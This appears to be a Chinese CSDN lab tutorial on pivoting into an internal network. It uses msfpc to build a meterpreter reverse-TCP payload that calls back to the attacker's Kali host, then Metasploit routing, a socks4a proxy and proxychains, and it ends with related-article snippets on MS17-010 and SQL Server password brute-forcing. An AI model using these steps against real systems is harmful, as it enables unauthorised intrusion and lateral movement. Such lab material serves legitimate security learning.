双网卡 sql server 服务器_msf+proxychains代理内部服务器所有流量

最新推荐文章于 2024-08-19 16:45:25 发布
最新推荐文章于 2024-08-19 16:45:25 发布
阅读量586 收藏
点赞数
文章标签: 双网卡 sql server 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42474537/article/details/113369895
版权

proxychains代理内部服务器所有流量

0x01 TD;LR

在渗透测试的过程中,通过msf拿到了立足点之后,可开始对内网的其他机器进行测试,但内网机器无法连接互联网,可通过设置socks4a代理将内部的流量代理出来,让外部机器可以直接访问内部的机器。

  • 工具

  • proxychains

  • msfpc

0x02 实验环境

aaf7993c412b4abd6919fdf8ac7aef2d.png

注意: FILESERVER为内部服务器,WEBSERVER为外部服务器,双网卡,可上网。

kali linux:攻击机,ip:192.168.1.129。

连通性测试。

a4b1adacc4a0fd326434591a998ca6f0.png

windows 2012 跳板机

双网卡

ip1:192.168.1.133

ip2:10.10.10.146

56703fab532e3d33bfb438e7e854bdbe.png

windows 2008 - webserver

内网服务器

ip:10.10.10.138

0b2de8a4388f54952d155ff6e28e054a.png

0x03 具体操作

1、通过msfpc生成payload,msfpc会生成两个文件,windows-meterpreter-staged-reverse-tcp-7777-exe和windows-meterpreter-staged-reverse-tcp-7777-exe.rc,一个是payload,一个是配置文件,并利用python建立临时服务器。

msfpc msf windows 192.168.1.129 7777

99803a7f3bb53fe1a5ce139bdaa99a8d.png

2、访问python建立的服务器,下载exe文件,执行。

f27782d5b2c0d70824faea2d4fd6fb2a.png

3、启动msfcosole

msfconsole -r windows-meterpreter-staged-reverse-tcp-7777-exe.rc

4、执行exe获取,meterpreter。

e1bb2c6bbcea769174517e6795ee7922.png

5、添加路由。

16b78181aaba87038358a4c4d1b4696f.png

6、设置socks4a服务器。

msf5 exploit(multi/handler) > use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) > show optionsModule options (auxiliary/server/socks4a):   Name     Current Setting  Required  Description   ----     ---------------  --------  -----------   SRVHOST  0.0.0.0          yes       The address to listen on   SRVPORT  1080             yes       The port to listen on.Auxiliary action:   Name   Description   ----   -----------   Proxy  msf5 auxiliary(server/socks4a) > set SRVPORT 1080SRVPORT => 1080msf5 auxiliary(server/socks4a) > run[*] Auxiliary module running as background job 1.msf5 auxiliary(server/socks4a) > [*] Starting the socks4a proxy server

7、配置proxychains

kali@kali:~/Desktop$ tail /etc/proxychains.conf ##       proxy types: http, socks4, socks5#        ( auth types supported: "basic"-http  "user/pass"-socks )#[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"# socks4        127.0.0.1 9050socks4  127.0.0.1 1088

8、访问内部服务器应用。

a8c914ffae75a20d1d83081ea96e5188.png

9、设置socks host为127.0.0.1,port为1080,关闭http proxy代理。

fb25c93190e14028d2faf474c7c1878c.png

10、浏览器访问。6932ad465c744bf6c0f4e87210d33c32.png

42d6c8b7a3690ab9386860075ba91c3e.png

马达加斯加的大鹅
关注
socks5搭建_[内网渗透]MSF之配合proxychains搭建socks5代理
weixin_39887577的博客
12-08 3157
使用MSF搭建socks5代理首先获得一个 meterpreter shell,然后使用 auxiliary/server/socks_proxy 模块搭建代理meterpreter > run autoroute -s 192.168.77.1/24 # 获取路由meterpreter > backgroundmsf5 > use auxiliary/server/...
服务器多网卡多路由策略
黑马程序员官方博客
04-29 1189
场景背景与需求 某公司新买一台服务器, 服务器资源(cpu,内存,硬盘)比较多,并且有多个网卡。 运维工程师为了节省资源,在服务器上搭建多个服务,希望通过多个网卡实现流量分流。 但由于运维工程师对网络理解不够深入,将服务器的多个网卡都配置了同一个网段。 最后的结果是并不能正常的访问这多个服务。 场景分析 网卡设置了IP地址后,会产生一个与IP地址同网段的路由条目, 并与当前网卡名对应。...
内网渗透中proxtychainsmsf的配合使用
weixin_45630387的博客
06-18 332
proxtychain内网渗透使用简单尝试
利用MSF设置代理
Continuejww的博客
11-10 1273
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
sql1433端口msf、hydra弱口令爆破,获得了sql-server的权限,通过几种方式能够提权
weixin_64655821的博客
08-31 3756
如果得到了1433端口,进行弱口令爆破 ,百度下1433端口,弱口令爆破的方式,kali 中msf hydra弱口令爆破 。总结获得弱口令,获得了sql-server的权限,通过几种方式能够提权。
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
qq_46258964的博客
07-01 2533
MSF后渗透的一些操作 端口转发 添加路由,横向渗透(跨网段攻击) 利用arp扫描内网主机 Socks代理篇 新版的msf和老版的不一样,代理模块也不一样。 auxiliary/server/socks_proxy 配置proxychains代理软件去连接建立好的socks隧道,便可以成功访问内网。 proxychains+nmap扫描主机是否存在漏洞 proxychains使用msf框架...
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
matlab的egde源代码-matlab_px4_msf:matlab_px4_msf
05-22
matlab_px4_msf开始 此文件夹包含Matlab中带有MSF的ECL组件的派生和测试套件。 运行EKF重放的说明 确保“ EKF_replay”目录位于您具有完全读写访问权限的位置 在“ EKF_replay”目录下创建一个“ TestData”子目录 ...
com.tencent.mobileqq_MSF.21.03.26.17.qlog
03-27
com.tencent.mobileqq_MSF.21.03.26.17.qlog
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2006
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6832
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
红日靶场--内网渗透练习
Nailaoyyds的博客
04-21 4190
环境介绍: 内网 kali 192.168.171.137 win7 192.168.171.153 192.168.52.130 win2003 192.168.52.131 win2008 192.168.52.138 信息收集 内网主机存...
ProxyChains图文教程
xiongIT的博客
12-04 3282
ProxyChains 是一个开源代理工具,能够强制使任何应用的 TCP 连接使用 SOCKS4,SOCKS 或者 HTTP(S)代理进行连接。
内网渗透-msf及socks代理转发
baynk的博客
05-29 9399
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
msf+proxychains组合搭建socks5隧道 | 内网穿透
最新发布
ULGANOY的博客
08-19 429
socks5隧道 | 内网穿透技术学习
msf 代理和转发
03-11 5446
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理
在云服务器上安装msf
07-28
在云服务器上安装Metasploit Framework (MSF)可以通过使用MSF提供的一键安装脚本来完成。这种方法比离线安装更为方便,因为云服务器已经具备了搭建虚拟机环境的条件。首先,您需要使用以下命令下载并运行MSF安装脚本: ``` wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb chmod 755 msfupdate.erb ./msfupdate.erb ``` 这将自动下载并安装Metasploit Framework到您的云服务器上。安装完成后,您可以使用以下命令启动MSF: ``` msfconsole ``` 请注意,安装过程中可能需要一些时间,具体取决于您的云服务器的性能和网络速度。此外,如果您在云服务器上使用的是不同的用户,请确保以root或具有管理员权限的用户身份运行上述命令。这样,您就可以在云服务器上成功安装并使用MSF工具了。\[1\] #### 引用[.reference_title] - *1* *3* [云服务器在CentOS7中安装msf工具](https://blog.csdn.net/weixin_44268918/article/details/129771330)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [阿里云服务器安装MSF](https://blog.csdn.net/qq_43590351/article/details/126627769)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值